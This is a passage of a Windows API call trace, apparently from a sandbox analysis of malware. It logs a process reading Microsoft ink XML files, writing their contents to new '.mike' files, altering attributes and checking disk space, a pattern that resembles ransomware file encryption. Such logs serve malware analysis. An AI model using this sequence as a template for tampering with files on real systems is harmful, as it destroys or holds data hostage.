lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpFilePart=0x0) returned 0x3d [0044.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0044.069] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.069] GetFileType (hFile=0x264) returned 0x1 [0044.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0044.069] GetFileType (hFile=0x264) returned 0x1 [0044.070] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0044.070] ReadFile (in: hFile=0x264, lpBuffer=0x223b464, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x223b464*, lpNumberOfBytesRead=0x2af0c8*=0x9ee, lpOverlapped=0x0) returned 1 [0044.071] CloseHandle (hObject=0x264) returned 1 [0044.072] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", lpFilePart=0x0) returned 0x42 [0044.072] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0044.072] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.072] GetFileType (hFile=0x264) returned 0x1 [0044.072] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0044.072] GetFileType (hFile=0x264) returned 0x1 [0044.072] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0044.072] WriteFile (in: hFile=0x264, lpBuffer=0x2241e80*, nNumberOfBytesToWrite=0x9f0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2241e80*, lpNumberOfBytesWritten=0x2af0bc*=0x9f0, lpOverlapped=0x0) returned 1 [0044.072] CloseHandle (hObject=0x264) returned 1 [0044.074] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", lpFilePart=0x0) returned 0x42 [0044.074] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0044.074] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.074] GetFileType (hFile=0x264) returned 0x1 [0044.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0044.074] GetFileType (hFile=0x264) returned 0x1 [0044.075] WriteFile (in: hFile=0x264, lpBuffer=0x2245094*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2245094*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0044.075] CloseHandle (hObject=0x264) returned 1 [0044.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpFilePart=0x0) returned 0x3d [0044.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", lpFilePart=0x0) returned 0x42 [0044.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.076] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe477cb00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe477cb00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe47a2c60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc10)) returned 1 [0044.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpFilePart=0x0) returned 0x3d [0044.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", lpFilePart=0x0) returned 0x42 [0044.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0044.076] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2246744 | out: lpFileInformation=0x2246744*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe477cb00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe477cb00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe47a2c60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc10)) returned 1 [0044.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0044.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpFilePart=0x0) returned 0x3d [0044.077] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", dwFileAttributes=0x80) returned 0 [0044.078] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpFilePart=0x0) returned 0x3d [0044.078] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", lpFilePart=0x0) returned 0x42 [0044.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0044.078] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe477cb00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe477cb00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe47a2c60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc10)) returned 1 [0044.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0044.078] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpFilePart=0x0) returned 0x3d [0044.078] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", lpFilePart=0x0) returned 0x42 [0044.078] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.mike")) returned 1 [0044.079] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpFilePart=0x0) returned 0x3d [0044.079] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpFilePart=0x0) returned 0x3d [0044.079] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpFilePart=0x0) returned 0x3d [0044.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0044.079] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0044.080] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpFilePart=0x0) returned 0x3d [0044.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0044.080] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.081] GetFileType (hFile=0x264) returned 0x1 [0044.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0044.081] GetFileType (hFile=0x264) returned 0x1 [0044.081] CloseHandle (hObject=0x264) returned 1 [0044.081] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpFilePart=0x0) returned 0x3d [0044.081] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpFilePart=0x0) returned 0x3d [0044.081] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0044.081] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0044.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0044.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0044.082] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), fInfoLevelId=0x0, lpFileInformation=0x22486a4 | out: lpFileInformation=0x22486a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08)) returned 1 [0044.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0044.082] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpFilePart=0x0) returned 0x3d [0044.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0044.082] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), fInfoLevelId=0x0, lpFileInformation=0x2248994 | out: lpFileInformation=0x2248994*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08)) returned 1 [0044.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0044.082] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpFilePart=0x0) returned 0x3d [0044.082] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", lpFilePart=0x0) returned 0x42 [0044.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.082] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.082] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpFilePart=0x0) returned 0x3d [0044.082] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpFilePart=0x0) returned 0x3d [0044.082] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpFilePart=0x0) returned 0x3d [0044.082] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", lpFilePart=0x0) returned 0x42 [0044.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0044.083] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0044.083] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", lpFilePart=0x0) returned 0x42 [0044.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0044.083] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.083] GetFileType (hFile=0x264) returned 0x1 [0044.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0044.083] GetFileType (hFile=0x264) returned 0x1 [0044.083] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0044.083] WriteFile (in: hFile=0x264, lpBuffer=0x22496e8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x22496e8*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0044.084] CloseHandle (hObject=0x264) returned 1 [0044.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0044.084] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), fInfoLevelId=0x0, lpFileInformation=0x224922c | out: lpFileInformation=0x224922c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08)) returned 1 [0044.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0044.085] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpFilePart=0x0) returned 0x3d [0044.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0044.085] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.085] GetFileType (hFile=0x264) returned 0x1 [0044.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0044.085] GetFileType (hFile=0x264) returned 0x1 [0044.085] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0044.085] ReadFile (in: hFile=0x264, lpBuffer=0x224a7fc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x224a7fc*, lpNumberOfBytesRead=0x2af0c8*=0xa08, lpOverlapped=0x0) returned 1 [0044.086] CloseHandle (hObject=0x264) returned 1 [0044.087] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", lpFilePart=0x0) returned 0x42 [0044.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0044.087] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.087] GetFileType (hFile=0x264) returned 0x1 [0044.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0044.087] GetFileType (hFile=0x264) returned 0x1 [0044.087] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0044.087] WriteFile (in: hFile=0x264, lpBuffer=0x22512d4*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x22512d4*, lpNumberOfBytesWritten=0x2af0bc*=0xa10, lpOverlapped=0x0) returned 1 [0044.087] CloseHandle (hObject=0x264) returned 1 [0044.088] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", lpFilePart=0x0) returned 0x42 [0044.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0044.088] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.088] GetFileType (hFile=0x264) returned 0x1 [0044.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0044.088] GetFileType (hFile=0x264) returned 0x1 [0044.089] WriteFile (in: hFile=0x264, lpBuffer=0x22544e8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x22544e8*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0044.090] CloseHandle (hObject=0x264) returned 1 [0044.090] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpFilePart=0x0) returned 0x3d [0044.090] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", lpFilePart=0x0) returned 0x42 [0044.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.090] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47a2c60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe47a2c60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe47c8dc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc30)) returned 1 [0044.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.091] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpFilePart=0x0) returned 0x3d [0044.091] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", lpFilePart=0x0) returned 0x42 